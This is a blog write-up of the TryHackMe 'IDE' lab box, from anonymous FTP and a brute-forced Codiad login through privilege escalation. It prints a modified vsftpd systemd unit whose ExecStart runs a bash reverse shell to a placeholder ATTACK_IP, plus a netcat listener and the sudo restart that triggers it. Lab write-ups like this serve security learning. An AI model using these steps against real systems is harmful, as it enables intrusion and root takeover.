Open in app

Sign in

Write

Sign in

Tryhackme-IDE

cyberwarehack
3 min readFeb 15, 2022

Hey guys today we are going to Hack a tryhackme box IDE . Which is marked as easy so let’s see.

Let’s start with nmap scan.

So as you can see there are total 4 ports are open from which ftp anonymous login is allowed lets see what in there.

When you login with ftp you be tricked but notice the 3 dots at the last file. You will get a message in that folder.

From the message we see that john has reset his password to default one.When you go to http://ide.thm:62337 you will get a login form try brute forcing the login form the password is easy. You can also see the version number of the web based ide. Search it on searchsploit you find an exploit.

Exploitation

TryHackMe IDE — User Flag

So let’s exploit. When you run your exploit your might look similar to the below one. You can refer this github link

After getting shell lets upgrade our shell using python tty.

python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

Even after getting into the target we cannot acess the user.txt file. We can also see for history under .bash_history when we cat under .bash_history you get the password for user drac and that’s how we get the user.txt file.

TryHackMe IDE — Root Flag

After getting the user flag lets move ahead with root flag. When you run sudo -l you get the following output.

Matching Defaults entries for drac on ide:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

This means the user drac can run all command on “/usr/sbin/service vsftpd restart” file. Edit this file as shown below.

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACK_IP/9003 0>&1
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

The line 6 is a bash reverseshell. Now in other terminal start a netcat listener

rlwrap nc -lvnp 9003

Now, because the service file is edited you should run: systemctl daemon-reload first. You should enter the password for the drac user. Afterwards, run:

sudo /usr/sbin/service vsftpd restart

After executing the restart of the service, you should receive a root shell in the listening terminal. The root.txt is located at: /root/root.txt.

IDE was an easy box to root. It involves an old version of Codiad that contains a public exploit. It is also important to use strong forms of authentication. Last,users should not have full control over a Linux service. If in control, they are able to elevate privileges fairly easy.

IF you love my write up please clap for me and you can also follow me on instagram !!!!!!!!

Tryhackme Writeup
Tryhackme
Privilege Escalation
Nmap
Tryhackme Walkthrough

--

--

cyberwarehack

Written by cyberwarehack

30 Followers

Cyberfreak Love Hacking, Blogging

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams